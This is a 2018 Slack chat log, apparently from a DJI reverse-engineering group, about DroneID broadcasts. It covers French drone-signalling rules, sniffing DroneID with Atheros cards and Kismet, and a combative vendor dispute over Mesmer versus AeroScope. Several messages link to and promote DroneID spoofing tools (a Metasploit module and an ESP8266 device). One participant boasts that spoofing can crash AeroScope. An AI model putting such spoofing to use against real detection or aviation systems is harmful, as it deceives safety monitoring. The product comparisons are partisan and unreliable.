[2018-04-09 22:06:11] validat0r : maybe a nice dark blue would suffice

[2018-04-10 01:45:20] ben_lin : RGB drones

[2018-04-10 03:18:37] hostile : I'll check into this more @mathieu.peyrega thanks...

[2018-04-10 03:21:20] hostile : <https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fnewsletter.ffam.asso.fr%2Fnwlt%2Ffichiers%2Fprojet-arrete-signalement.pdf&edit-text=&act=url>

[2018-04-10 04:54:59] ben_lin : so France is first

[2018-04-10 04:55:11] ben_lin : Then the whole EU might follow suite

[2018-04-10 04:55:54] ben_lin : Does the document specify who can read that broadcast, or is it public like ads-b?

[2018-04-10 05:55:04] mathieu.peyrega : I've been reading it more carrefully and really this looks such a stupid specification to me... no minimal emission power requiered, no "omni directionnal antenna"....

[2018-04-10 05:55:31] mathieu.peyrega : and no crypting so it's open bar for spoofing whatever detection system they would setup

[2018-04-10 05:56:28] mathieu.peyrega : officiel law projects are : <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-decret-signalement.pdf>

[2018-04-10 05:56:41] mathieu.peyrega : <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-decret-seuils.pdf>

[2018-04-10 05:56:49] mathieu.peyrega : <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-arrete-signalement.pdf>

[2018-04-10 05:57:00] mathieu.peyrega : (the second one only set the max mass not concerned by the new requierements to 800g)

[2018-04-10 06:11:55] mathieu.peyrega : also it's quite ambiguous if this mass is with or without battery

[2018-04-10 06:33:36] ben_lin : That doesn‘t make any sense at all

[2018-04-10 06:33:48] ben_lin : So they decided to ditch the phantom for pro but keep the Mavic

[2018-04-10 06:44:37] mathieu.peyrega : no, the opposite, you have to implement the mecanism if you are heavier than 800g (with or without battery ? I don't know...)

[2018-04-10 12:03:51] hostile : <https://dji-rev.slack.com/archives/C6T95M0N6/p1523336154000111> if you know the spec. You can read it. @ben_lin =]

[2018-04-10 12:06:33] mathieu.peyrega : official project page were they are seeking for comments before may 5th : <https://www.entreprises.gouv.fr/numerique/renforcement-de-la-securite-de-usage-des-drones-civils> (there is an e-mail address or postal address).

[2018-04-10 12:07:45] mathieu.peyrega : Spoofing is explicitely prohibited in the document, also using unecrypted frame is IMHO a very bad idea.. Nothing is told explicitely about who is allowed to listen, maybe (probably) there is a more generic text for that, but the same comment as before applies...

[2018-04-10 12:08:53] mathieu.peyrega : I feedback that this may lead to security leaks, e.g. allowing to "listen" trajectories when us "surveyors" work on a project legally may leak some info about the map of the area (same as for this running record app that buzzed recently)

[2018-04-10 12:09:38] mathieu.peyrega : They are not adressing the "grandfathering" issue

[2018-04-10 12:12:12] hostile : "Spoofing is explicitely prohibited in the document" lololol he said "in the document" BWAHAHAHAHAHAHAHAHAHAH =]

[2018-04-10 12:12:20] hostile : need to prohibit that shit in the technology layer :wink:

[2018-04-10 12:12:32] mathieu.peyrega : I understand that of course...

[2018-04-10 12:12:38] mathieu.peyrega : that's what I wrote them

[2018-04-10 12:12:51] hostile : indeed. I know you grok that! these public officials are stupid tho

[2018-04-10 12:13:22] mathieu.peyrega : at least that will not make too many lines of code for you to implement "french drone detection" in your products :slightly_smiling_face:

[2018-04-10 12:13:39] hostile : do you have the exact wording where it says spoofing is prohibited?

[2018-04-10 12:13:49] hostile : indeed... i suspect Parrot has already implemented this, or will very soon

[2018-04-10 12:14:01] mathieu.peyrega : « Art. R. 20- 25 -2.- Est punie de l’amende prévue pour les contraventions de la cinquième classe: « L’émission volontaire d'un signalement électronique ou numérique, mentionné au premier alinéa de l’article L. 34- 9- 2, ne correspondant pas à un vol effectif, en cours au moment de l'émission de celui- ci et émanant d’un aéronef circulant sans personne à bord enregistré dans la base mentionnée à l’article XXX du code des transports . »

[2018-04-10 12:14:37] mathieu.peyrega : something lile "purposely emission of electronic signal not matching a real flight...."

[2018-04-10 12:14:42] hostile : =]

[2018-04-10 12:15:33] ben_lin : France did faster than China

[2018-04-10 12:15:35] ben_lin : Wow

[2018-04-10 12:15:39] ben_lin : Oh wait

[2018-04-10 12:15:47] hostile : lol

[2018-04-10 12:17:17] ben_lin : I am waiting for spoofing to be exploited

[2018-04-10 12:17:52] ben_lin : Imagine French ATC seeing 10000 drones at the same time on radar, charging towards military runways

[2018-04-10 12:17:53] mathieu.peyrega : i really suck at those RF stuff, but i'm pretty sure that broadcasting a single Wifi frame type should be pretty easy even for me !

[2018-04-10 12:18:06] hostile : @ben_lin why wait? the time is now. =] <https://twitter.com/d0tslash/status/941348396949999617>

[2018-04-10 12:18:35] ben_lin : Rofl faster than expected

[2018-04-10 12:18:36] hostile : <https://github.com/rapid7/metasploit-framework/pull/9301/files#diff-122cdd376619bdae7265773f5ad64f66R137>

[2018-04-10 12:18:47] hostile : line 137 can be edited to support french DroneID with ease

[2018-04-10 12:19:47] ben_lin : Rekt

[2018-04-10 12:19:49] ben_lin : DO

[2018-04-10 12:19:51] ben_lin : DOA

[2018-04-10 12:25:40] hostile : hehe <https://twitter.com/d0tslash/status/983682341460697089>

[2018-04-10 12:28:14] hostile : also... here is a hardware example for DroneID spoofing. <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>

[2018-04-10 13:48:50] mathieu.peyrega : small "naive" question : I'm looking at 802.11 and it seems that management frame (type 0) only allows 12 subtypes, and subtype "6" is not one of them... How can I then implement a requirement asking me to be complient to 802.11n AND use a frame with type 0 / subtype 6 :slightly_smiling_face: ?

[2018-04-10 13:49:51] mathieu.peyrega : does 802.11 "allow" subtypes not in the table 4.1 list ?

[2018-04-10 13:50:05] mathieu.peyrega : (I don't have the full doc)

[2018-04-11 12:42:16] aholtzma : @mathieu.peyrega you can download full 802.11 spec from IEEE

[2018-04-11 12:42:18] aholtzma : <https://ieeexplore.ieee.org/document/7786995/>

[2018-04-16 06:24:32] mathieu.peyrega : <https://www.icao.int/Meetings/DRONEENABLE2/Documents/ICAO%20RF_DRONE_ENABLE%202018I.pdf>

[2018-04-16 06:24:51] mathieu.peyrega : <https://www.icao.int/Meetings/DRONEENABLE2/Pages/default.aspx>

[2018-04-16 13:08:32] hostile : thanks for sharing that @mathieu.peyrega

[2018-04-16 14:27:56] mathieu.peyrega : you're welcome ! now you can plan a trip to China and test if their "go to jail" trigger is more sensitive than in Greece :slightly_smiling_face:

[2018-04-16 14:39:35] hostile : LOL

[2018-04-18 12:13:59] aholtzma : @mathieu.peyrega those links seems dead

[2018-04-18 12:16:02] aholtzma : actually looks like ICAO is down, LOL

[2018-04-18 12:16:20] ender : worked yesterday…

[2018-04-18 13:48:15] hostile : down for me too @aholtzma

[2018-04-18 13:57:20] mathieu.peyrega : for me too...

[2018-04-18 13:57:38] ender : NSA got a copy… :wink:

[2018-04-18 14:02:03] jakub : @jakub uploaded a file: [ICAO RF_DRONE_ENABLE 2018I.pdf](https://dji-rev.slack.com/files/U8TQ4SVF1/FA8CT1M6D/icao_rf_drone_enable_2018i.pdf)

[2018-04-18 14:06:48] mathieu.peyrega : both links back online...

[2018-04-18 14:24:17] hostile : @hostile uploaded a file: [image.png](https://dji-rev.slack.com/files/U60D1SM7V/FA88VKW0G/image.png)

[2018-04-18 14:24:22] hostile : lol

[2018-04-18 14:39:06] jakub : uploaded just in case :stuck_out_tongue:

[2018-04-26 15:33:51] eseven : This document could be interesting too! <https://conferences.sigcomm.org/sigcomm/2013/papers/srif/p9.pdf> :wink:

[2018-04-26 15:39:34] hostile : thanks

[2018-04-26 15:40:02] hostile : looks like that paper was written by the people who make the above code

[2018-04-26 15:40:17] hostile : <https://www.wime-project.net>

[2018-04-26 15:40:25] eseven : could be...

[2018-04-26 15:40:33] hostile : Bastian Bloessl is quoted in the paper it is 100% same work =]

[2018-04-26 15:41:59] eseven : But a little bit more explained... I'll try!

[2018-05-01 13:27:26] hostile : yes

[2018-05-01 13:27:35] hostile : you are messing with a Spark RC I see?

[2018-05-01 13:28:01] hostile : the Adhoc connections use 62:60:1f and 64:60:1f instead of the traditional 60:60:1f @miliu00

[2018-05-01 14:51:26] eseven : @hostile Ok. But the OUI assigned to DJI is 60:60:1F, and not the other ones. It means that uses a third's hardware and is using software defined interfaces.... ubiquiti hardware, maybe? When spark is paired to RC, witch MAC use to broadcast the droneid msgs?

[2018-05-01 14:59:58] hostile : no

[2018-05-01 15:00:07] hostile : assigned OUI doesn't mean anything

[2018-05-01 15:00:11] hostile : they can use what ever the fuck they want

[2018-05-01 15:00:19] hostile : the hardware is Atheros...

[2018-05-01 15:00:21] hostile : as it always has been

[2018-05-01 15:00:53] hostile : when paired to an RC it uses 62:60:1f over a 5mhz chanel spacing adhoc link

[2018-05-01 17:33:54] eseven : Thanks @hostile ! And it is equal to all Dji models? Droneid for phantom 3pro, use same method or it goes embeded on lightbridge packets?

[2018-05-01 17:49:27] hostile : p3 has no droneID last I checked

[2018-05-03 14:49:48] hostile : @mathieu.peyrega what was the final conclusion of your Awus052nh testing? can you tell me the kernel module it uses? can you give me output of lsusb? does it indeed see the "5mhz" channel spacing that picks up the adhoc network ?

[2018-05-03 14:54:55] mathieu.peyrega : i'm not sure of the details, but basically i've never been able to pick u pthe adhoc network with it, but was definetly seeing other AP in the neighboorhood

[2018-05-03 14:55:07] mathieu.peyrega : i'll send the lsusb output soon

[2018-05-03 15:24:51] hostile : cool thats all I neeed

[2018-05-03 15:25:00] hostile : it tells me it was not actually working (as expected)

[2018-05-05 11:34:29] cyberagent2038 :

[2018-05-16 15:13:46] pedrocab : Hi all, I’ve been these days playing around with Spark and DroneID, but looks like it’s disable. I see the option in the settings menu, but both UUID and desc are empty. When I try to enable and sniff with kismet, nothing appears to be there. Is possible that this feature is only enable in some countries ??

[2018-05-16 15:30:01] pedrocab : (Of course I see the Spark WPA ESSID Beacon Frames, but nothing about serial number, UUID or lat/long in these frames)

[2018-05-16 15:31:26] pedrocab : Spark MAC OUI is 60:60:1f

[2018-05-16 15:38:44] kilrah : motors running?

[2018-05-16 15:39:10] kilrah : using one of the very rare wifi adapters that supports the odd channel width used by the spark?

[2018-05-16 15:41:20] pedrocab : Yes, motors running. On 5G band no one adapter was able to detect the WiFi, so I forced 2.4G band. Then I can capture the beacon frames, but nothing related with DronID.

[2018-05-16 15:45:31] kilrah : see the messages further up, 60:60:1f are NOT the right packets, if you only get those then your wifi adapter is likely not tuning/not capable to tune on to the corrct non-standard channels.

[2018-05-16 15:46:05] hostile : @pedrocab what wifi card are you using?

[2018-05-16 15:46:16] hostile : you MUST use an Atheros card... that can tune to 5mhz

[2018-05-16 15:46:33] hostile : unless you are connecting via wifi with your phone

[2018-05-16 15:47:03] hostile : if you are not using Atheros PCI... or M.2 card... chances are you are doing it wrong.

[2018-05-16 15:49:02] pedrocab : I’m connecting to the Spark using phone, yes. On the laptop I’m sniffing with Alfa AWUS036AC card (Realtek rtl8812au)

[2018-05-16 15:49:22] hostile : which version of kismet are you using?

[2018-05-16 15:49:24] hostile : from git?

[2018-05-16 15:49:31] pedrocab : Yep

[2018-05-16 15:49:42] hostile : what firmware is on the spark?

[2018-05-16 15:50:08] hostile : in the kismet UI... click on the 60:60:1f drone and send me a screen shot plz

[2018-05-16 15:50:19] hostile : in the web interface

[2018-05-16 15:50:37] pedrocab : I have to check, don’t know by heart. I guess the last one, as I was flying the drone to test with motors on ...

[2018-05-16 15:50:59] pedrocab : Ok, I will send you screen shot.

[2018-05-16 15:51:13] validat0r : I tried that, too, with my spark a couple of weeks ago. Managed to see some incomplete droneid packets, not more sadly

[2018-05-16 15:52:16] validat0r : If you manage to find complete droneid packets with rth location and so on, I'd be interested in your setup

[2018-05-16 15:53:39] hostile : I do know DJI has broken the packet format a few times on wifi

[2018-05-16 15:53:57] hostile : it may also depend on the wifi card...

[2018-05-16 15:54:04] hostile : try atheros PCI instead of alfa

[2018-05-16 15:54:20] hostile : @pedrocab "Realtek rtl8812au" this 100% will NOT work ever

[2018-05-16 15:54:26] hostile : the kernel drivers don't support 5mhz channels

[2018-05-16 15:54:27] hostile : period

[2018-05-16 15:54:37] hostile : you are not going to find a USB card that this works with

[2018-05-16 15:54:46] hostile : it MUST be Atheros PCI or M.2.

[2018-05-16 15:55:45] pedrocab : I’m using astsam drivers, support monitor mode and 5Ghz

[2018-05-16 15:55:49] validat0r : Well, I read different stories here over the weeks. I'm not convinced I saw the whole packets.

[2018-05-16 15:56:24] pedrocab : But I will double check with Atheros PCI, thank you @hostile

[2018-05-16 16:12:53] pedrocab : <https://github.com/astsam/rtl8812au>

[2018-05-16 16:14:56] hostile : yeah its the chipset... rtl won't ever do 5mhz

[2018-05-16 16:15:08] hostile : 5hgz is not 5mhz

[2018-05-16 16:15:23] hostile : 5mhz channel spacing on either 2.4ghz or 5.8ghz is what Droneid uses

[2018-05-16 16:15:28] hostile : MOST wifi is 20mhz channel spacing

[2018-05-16 16:15:38] hostile : stop confusing 5ghz with 5mhz

[2018-05-16 16:17:13] pedrocab : Sorry, you are totally right, I was reading 5Ghz, not 5Mhz

[2018-05-16 16:17:33] pedrocab : :joy::rolling_on_the_floor_laughing:

[2018-05-16 16:19:44] jakub : 60meters band? hoh

[2018-05-16 16:19:47] jakub : :wink:

[2018-05-16 16:20:28] validat0r : I also tried to force the spark on 2,4ghz so I would have the chance to capture packets with 2,4ghz equipment .. Maybe a path for you, too

[2018-05-16 16:21:08] pedrocab : @hostile In which 802.11 standard are defined these 5 Mhz wide channels ?

[2018-05-16 16:23:21] pedrocab : I only found references on 802.11y (3.65Ghz) ...

[2018-05-16 16:23:22] pedrocab : <https://en.wikipedia.org/wiki/List_of_WLAN_channels>

[2018-05-16 16:23:30] hostile : it is out of spec...

[2018-05-16 16:23:37] hostile : it is not properly defined

[2018-05-16 16:23:39] hostile : only Atheros does it

[2018-05-16 16:23:45] hostile : people use it for long haul

[2018-05-16 16:24:15] hostile : <https://wiki.freebsd.org/dev/ath_hal%284%29/HalfQuarterRate>

[2018-05-16 16:24:17] pedrocab : Now I'm starting to understand why is so hard to get them ..

[2018-05-16 16:24:18] pedrocab : xDDD

[2018-05-16 16:24:20] hostile : it is called "Quarter rate"

[2018-05-16 16:24:23] pedrocab : ok

[2018-05-16 16:24:34] hostile : only ar5k and ar9k can do it

[2018-05-16 16:25:00] hostile : ar5k is OLD tho and only does 2.4ghz

[2018-05-16 16:25:16] hostile : hence why you want ar9k

[2018-05-16 16:26:07] hostile : but one of these

[2018-05-16 16:26:09] hostile : ```Atheros QCNFA222 AR5BWB222 802.11a/b/g/n 2.4/5GHz BT4.0 WIFI WLAN Card 4K380 M.2```

[2018-05-16 16:26:14] pedrocab : ok, <https://wikidevi.com/wiki/TP-LINK_TL-WN722N> should work, although is USB, right ?

[2018-05-16 16:26:25] hostile : there are NO usb cards that work

[2018-05-16 16:26:30] hostile : ONLY PCI or M.2

[2018-05-16 16:26:31] hostile : <https://www.ebay.com/itm/401394374583?ViewItem=&item=401394374583&ppid=PPX000608&cnac=US&rsta=en_US(en_US)&cust=9K576122N47635257&unptid=1b905872-0fb8-11e8-888e-101f7436f90c&t=&cal=f1f57fd92c44d&calc=f1f57fd92c44d&calf=f1f57fd92c44d&unp_tpcid=email-receipt-auction-payment&page=main:email&pgrp=main:email&e=op&mchn=em&s=ci&mail=sys>

[2018-05-16 16:26:46] hostile : (good for laptops) ---^

[2018-05-16 16:29:03] pedrocab : ok, get it

[2018-05-16 16:49:41] pedrocab : <http://laptopmedia.com/laptop-m-2-ngff-ssd-compatibility-list/>

[2018-05-16 16:50:07] pedrocab : list of laptops supporting M.2 connectors, not easy to find out a list

[2018-05-16 16:51:05] pedrocab : I should buy a PCI box or a new laptop ...

[2018-05-16 16:57:15] hostile : mini pci atheros is fine too...

[2018-05-16 16:57:25] hostile : almost every laptop has either mini pci or m.2 internally

[2018-05-16 16:57:35] hostile : anything semi modern at least

[2018-05-16 17:06:37] pedrocab : xD, yes. Mine is too old .. I need a new laptop

[2018-05-16 17:25:17] pedrocab : I will try to replace the internal Wifi card, I will let you know

[2018-05-16 17:25:32] pedrocab : Thank you

[2018-05-16 17:26:18] pedrocab : (the internal wifi adapter is mini pci, so let's try a new atheros card)

[2018-05-16 18:41:39] hostile : that should work fine

[2018-05-16 18:41:48] hostile : make sure it uses ath9k driver

[2018-05-16 18:41:51] hostile : and not ath10k

[2018-05-16 18:46:24] kilrah : nice $9 card, grabbed it

[2018-05-16 18:47:16] kilrah : will throw it on my udoo x86

[2018-05-16 18:47:18] kilrah : <https://shop.udoo.org/eu/x86.html>

[2018-05-16 18:49:59] hostile : nice

[2018-05-16 18:51:12] mathieu.peyrega : one small issue that may occur, some manufacturers have bios blacklists that prevent installing/changing the onplace card by another....

[2018-05-16 20:56:11] pedrocab : Uff, let’s give a try... I hope is not my case. The mini pci adapter is just 9$, nothing lost if there is so annoying black list

[2018-05-16 20:57:12] pedrocab : Laptop is a Toshiba Satellite Z30, I will take a look if someone tried before to replace WiFi card

[2018-05-16 21:08:19] pedrocab : @kilrah Cool the Udoo board, I have to test it

[2018-05-17 17:42:49] aholtzma : 5/10 mhz is in the 802.11a standard for 5GHz

[2018-05-17 17:43:02] aholtzma : didn’t get carried over into 11n

[2018-05-17 17:43:15] aholtzma : for 2.5

[2018-05-17 17:44:08] aholtzma : what you can actually buy as a wifi product is governed by the wifi alliance and they define a subset of the 802.11 standards that is required to be wifi compliant

[2018-05-17 17:44:44] aholtzma : so some cards have extra features that are 802.11 compliant, but not part of wifi

[2018-05-17 17:54:09] aholtzma : ath5k can do 5MHz 11a, but the current linux driver may not support it

[2018-05-17 17:56:56] aholtzma : actually the combination of 5 MHz bandwidth and 11n (HT) frames would be non-compliant with 802.11

[2018-05-17 17:57:05] aholtzma : and wouldn’t work on ath5k since it doesn’t support 11n

[2018-05-17 17:57:27] aholtzma : I presume that is what DJI is using (HT frames)

[2018-05-17 18:36:18] hostile : @aholtzma I've used it recently and it does support it

[2018-05-17 18:36:27] hostile : it IS non compliant...

[2018-05-17 18:36:30] hostile : dji is running out of spec

[2018-05-17 18:36:40] aholtzma : 5k?

[2018-05-17 18:38:22] aholtzma : I’m assuming they are using HT because that unlocks LDPC codes which is a range win

[2018-05-17 18:40:15] aholtzma : and mimo of course

[2018-05-17 18:43:13] hostile : yeah I have a laptop with an old Ubiquity PCMCIA or Cardbus radio

[2018-05-17 18:43:16] hostile : that uses ath5k

[2018-05-17 18:43:27] hostile : I had to do nothing special... the atheros hal has 5mhz support in it

[2018-05-17 18:56:10] aholtzma : ok so I guess no HT

[2018-05-17 18:56:12] aholtzma : interesting

[2018-05-17 18:56:52] aholtzma : keep that in mind if you ever think you are missing frames

[2018-05-17 18:57:16] aholtzma : rate adaptation may flip you between modes

[2018-05-17 18:58:23] aholtzma : so you’ll get the non-HT frames

[2018-05-17 18:59:34] aholtzma : but the HT frames will get dumped

[2018-05-22 20:25:53] pedrocab : Hi all again

[2018-05-22 20:26:13] pedrocab : I just received the new atheros card today

[2018-05-22 20:27:02] pedrocab : @pedrocab uploaded a file: [atheros.jpg](https://dji-rev.slack.com/files/U9321V56E/FAUF4F98V/atheros.jpg)

[2018-05-22 20:27:36] pedrocab : AR5BHB92, using ath9k driver

[2018-05-22 20:27:55] pedrocab : dual band, 802.11 a/b/g/n

[2018-05-22 20:28:14] pedrocab : PCI-e

[2018-05-22 20:28:18] pedrocab : but ...

[2018-05-22 20:29:15] pedrocab : only 60:60:1F MAC address, and none DroneID frames

[2018-05-22 20:32:52] pedrocab : I flew my spark around the card (5 mtrs), but nothing was detected by kismet as UAV

[2018-05-22 20:33:07] pedrocab : root@icarus:/opt/kismet/rest_examples# python uav_list.py root@icarus:/opt/kismet/rest_examples#

[2018-05-22 20:34:06] pedrocab : I see the spark essid on kismet web UI, but

[2018-05-22 20:34:15] pedrocab : just as Wifi AP

[2018-05-22 20:34:34] pedrocab : ALERT: DOT11D IEEE80211 Access Point BSSID 60:60:1F:xxxx SSID "Spark-RC-xxxx" advertised conflicting 802.11d information which may indicate AP spoofing/impersonation INFO: 802.11 Wi-Fi device 60:60:1F:xxxx advertising SSID 'Spark-xxx'

[2018-05-22 20:37:18] pedrocab : I will try this week-end to fly the drone just above the board, to be sure is not a range problem, but 5 mtrs should be a short distance to receive the frames ...

[2018-05-22 20:57:00] hostile : did you edit your kismet config file?

[2018-05-22 20:57:21] hostile : source=wlan9k2:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2018-05-22 20:57:35] hostile : make sure your source has the "W5" entries in it @pedrocab

[2018-05-22 21:05:04] pedrocab : No, dammit !! Totally right

[2018-05-22 21:05:52] pedrocab : Thank you again, @hostile

[2018-05-22 21:08:46] hostile : get it working?

[2018-05-22 21:10:55] pedrocab : On my way ...

[2018-05-22 21:23:43] pedrocab : ERROR: Could not set channel 12W5; ignoring error and continuing (unable to set frequency 12 6 0 via mac80211: error code -7)

[2018-05-22 21:24:02] pedrocab : I'm checking these errors

[2018-05-22 21:25:42] pedrocab : however it startup normally: Data source 'wlp4s0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11WG5,12W5,13W5,14W5"' launched successfully

[2018-05-22 21:44:22] pedrocab : I guess are related with wifi regulatory domains/countries, as is configured by default for US

[2018-05-22 21:44:35] pedrocab : I'm on it ...

[2018-05-22 22:30:58] pedrocab : Kismet is not able to tune on 149 to 163 -5Mhz- channels: "ERROR: Could not set channel xxW5; ignoring error and continuing (unable to set frequency xxx via mac80211: error code -7)", same on 12 to 14 channels (2.4).

[2018-05-22 22:31:13] pedrocab : @pedrocab uploaded a file: [channels.png](https://dji-rev.slack.com/files/U9321V56E/FATSHHSBT/channels.png)

[2018-05-22 22:33:18] pedrocab : I will continue investigating these errors tomorrow, I don't know if there is a problem with the "monitor mode" or are related with regulatory domains/countries

[2018-05-22 23:03:03] pedrocab : I force the spark to use one of the 2.4G/5Mhz channel allowed by the card, and now I can see the 62:60:1F MAC device

[2018-05-22 23:03:49] pedrocab : Is too late to flight the drone, I guess when motors are powered-on I will sniff the DroneID

[2018-05-22 23:12:24] pedrocab : I have to look carefully why kismet is unable to use/tune 5 Ghz channels

[2018-05-22 23:31:50] hostile : a few errors are fine @pedrocab just ignore them

[2018-05-22 23:32:29] hostile : as long as it is only like one or two of the channels don't worry

[2018-05-23 08:53:15] pedrocab : Ok @hostile

[2018-05-23 08:53:40] pedrocab : i'm trying a new approach, a SDR gnuradio block

[2018-05-23 08:53:53] pedrocab : as 5Mhz can be achieved by the HackRF

[2018-05-23 08:54:14] pedrocab : and forget about chipsets, wifi card, kismet, and so on ..

[2018-05-23 12:05:14] hostile : gr-80211 CAN pick it up, u have to feed redulting pcap to kismet by hand

[2018-05-30 03:38:18] sandwings247 : Hey gang interested in this effort. So a quick catch up sees that you see nothing related to DroneID? You do realize that the Remote Identification function in the DJI Apps, sets the UUID, Identification and the Flight Info fields? If you have the slide button in the off position, then your data is not transmitted. However if you have the slide button for UUID set, then the UUID value is sent.

[2018-05-30 03:46:42] sandwings247 : Do you or have you seen the AeroScope System that DJI sell

[2018-05-30 04:15:47] sandwings247 : The UUID I've seen appears to be 112 bits, with a max of 128 bits. The 112 Bits equate to 14 characters in length. Does anyone else confirm this at all

[2018-05-30 11:47:29] hostile : Aeroscope is trash

[2018-05-30 22:11:14] sandwings247 : hey why is thtat

[2018-05-31 00:41:15] hostile : cuz they didn't invest much time into it

[2018-05-31 00:41:29] hostile : it was a reaction to criticism about their products, and not a solution to a problem

[2018-05-31 00:41:41] hostile : just like everything DJI does... semi rushed

[2018-06-01 14:20:04] eseven : @sandwings247 in "Droneid" system, there are two kind of packets, one with the structure you told and the other with the custom field information, with one field that can fit 100 chars.... By the way,with UUID on both.:wink:

[2018-06-01 15:09:14] hostile : <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>

[2018-06-02 06:49:19] eseven : Good start document to investigate one step beyond...

[2018-06-04 04:56:48] sandwings247 : Have already seen that PDF by the folks are Mesmer. Of course Mesmer will go against the DJI push, as they charge a truck load of $$ for their system and the annual maintenance bill .... AeroScope is dirt cheap and out performs Mesmers Detection capabilities. Sorry if you work for Mesmer, but suspect you dont

[2018-06-04 13:27:07] hostile : @sandwings247 I work for Department 13... I helped build this place... I am happy to debate what ever you are implying....

[2018-06-04 13:27:45] hostile : AeroScope is NOT Dirt cheap... it is NOT $5000 like they said it is (more like 9k for the mobile I think, and more for the fixed site version), it requires a $60,000 SDK license to start doing the real stuff FWIW. So you are looking at like $70k to get started, and detecting only **SOME** of the DJI product line, ONLY the current revisions WITH drone ID enabled and not tampered with. Where as MESMER picks up non DJI products also, and does NOT require droneID signal present, and has been doing detections since Phantom2.

[2018-06-04 13:28:29] hostile : @sandwings247 "out performs Mesmers Detection capabilities" where ever did you get that impression at? Maybe I should say "sorry if you work for DJI...". That statement in and of itself tells me you don't have much experience around counter UAS platforms.

[2018-06-04 13:29:35] hostile : MESMER was well established before AeroScope was even considered a remote thought, DJI has been uncomfortable about D13 from day one, and argued that we can't even do the things that the US Govt has confirmed we can, such as mitigate LightBridge based drones.

[2018-06-04 13:30:44] hostile : @sandwings247 when have you used a MESMER system? and when have you used an Aeroscope? I've personally used them both. I can also make an aeroscope unit fall over and shit its pants in about 10 seconds worth of spoofing.

[2018-06-04 13:42:38] ender : ^---- Grabbing a bag of Popcorn…

[2018-06-04 13:50:57] hostile : @sandwings247 the other thing about Aeroscope, it isn't even competition to MESMER, it only does 1/3 o f what MESMER does if I were being conservative. You are only able to see, but can't do shit about it. want to watch a UAV deliver a bomb to its target ? Get Aeroscope, want to actually prevent it from doing so... get something else WITH mitigation capability. ANd don't believe that Jammers are gonna help with your AeroSCope SDK setup.

[2018-06-04 13:52:48] hostile : @hostile uploaded a file: [DCtxlocU0AEvyzT.jpg](https://dji-rev.slack.com/files/U60D1SM7V/FB19KV0S1/dctxlocu0aevyzt.jpg)

[2018-06-04 13:53:18] hostile : See those kumquats on the left.... those are AeroScope, See that other citrus right there, that fat Orange? That is MESMER. Any questions? Please come correct in your response. =]

[2018-06-04 13:54:34] hostile : detect only == dead....

[2018-06-05 00:32:44] sandwings247 : @hostile thanks for the posts, and guess I was wrong on the working for Mesmer. You would be rather foolish to think I've no C-UAS period, infact, what I have access to, is more than you could wish for. I think all C-UAS systems are full of it, complete waste of money, and over stating the systems capabilities. I know how "well" mesmer performs, and am aware of where its deployed. Not sure where you sourced your info, but I can advise that I dont work for DJI, so you may wish to think again. I actually dont like Mesmer period, but I do have your "Department 13" reps try to sell us Mesmer, every year, and every year we reject Mesmer. Tell you what, show me your detection logs from Mesmer for actual Detects? I have all of the D13 papers, and all of the glossy powerpoint slides, and brochures. Infact, we had a Mesmer a year ago, which D13 loaned to help sell it to us.

[2018-06-05 00:44:17] sandwings247 : As for AeroScope, it actually works against all DJI Quads, and the other 25-30% of NON DJI, its doesnt, is not a major concern. 10 X AeroScopes at $5000 each, full access. No contracts, no maintenance fees. However your info is somewhat correct, DJI are upping the costs of AeroScope and are requiring a yearly maintenance fee like Mesmer.

[2018-06-05 00:45:01] sandwings247 : Thanks for the cool picture of the fruit. Good to see you are passionate

[2018-06-05 00:51:24] hostile : "but I can advise that I dont work for DJI, so you may wish to think again." that was of course a joke...

[2018-06-05 00:51:44] hostile : I am keen to know why you think you are "aware of where Mesmer is deployed" fwiw. =]

[2018-06-05 00:51:53] sandwings247 : I like the US Government Reference, this will be the easiest for me to confirm your comments

[2018-06-05 00:52:28] hostile : "I actually don't like Mesmer period", seems like your implicit bias makes a bit more sense. It was coming out in your initial commentary .

[2018-06-05 00:52:47] sandwings247 : So before I go back into my building, and start the process of chasing up your comments with USG, anything I need to know

[2018-06-05 00:53:08] hostile : "try to sell us Mesmer, every year, and every year we reject Mesmer".... ok..... good for you lol. I'm not fond of sales depts generally speaking.

[2018-06-05 00:53:23] sandwings247 : lol good re Sales Department

[2018-06-05 00:53:27] hostile : "Tell you what, show me your detection logs from Mesmer for actual Detects?"... yeahhhhhhhhh

[2018-06-05 00:53:34] hostile : check those government papers I guess

[2018-06-05 00:54:02] hostile : "AeroScope, it actually works against all DJI Quads" no it does not.... did they add P2 support recently?

[2018-06-05 00:54:24] hostile : "other 25-30% of NON DJI" again... when did they start doing non dji detects?

[2018-06-05 00:54:38] hostile : "full access." that is NOT full access to the SDK...

[2018-06-05 00:55:02] sandwings247 : There are no detects for NON DJI Quads, hence the other 25-30% that AeroScope doesnt cater for, are not a concern.

[2018-06-05 00:55:30] hostile : "There are no detects for NON DJI Quads" what does that even mean? no detects for Aeroscope or generally speaking?

[2018-06-05 00:56:05] hostile : "So before I go back into my building, and start the process of chasing up your comments with USG, anything I need to know" yeah... there is... stop acting so smug.

[2018-06-05 00:56:27] hostile : "this will be the easiest for me to confirm your comments".... hey you already have all the papers, what is left to confirm?

[2018-06-05 00:56:43] hostile : besides you don't "like" the product... so why bother

[2018-06-05 00:57:11] sandwings247 : I've already seen Mesmer results for testing, having been involved in such C-UAS events.

[2018-06-05 00:57:27] hostile : good for you... you saw a dated snapshot, and now know it all :wink:

[2018-06-05 00:57:33] hostile : have fun going back into your building

[2018-06-05 00:58:44] sandwings247 : LOL, oh no, you pissy now? You cant even give me one valid reason to show Mesmer is better than any other C-UAS system on the market today?

[2018-06-05 00:59:11] hostile : "it actually works against all DJI Quads"... let me know how well it works when you spoof a pile of drones at it <https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof>

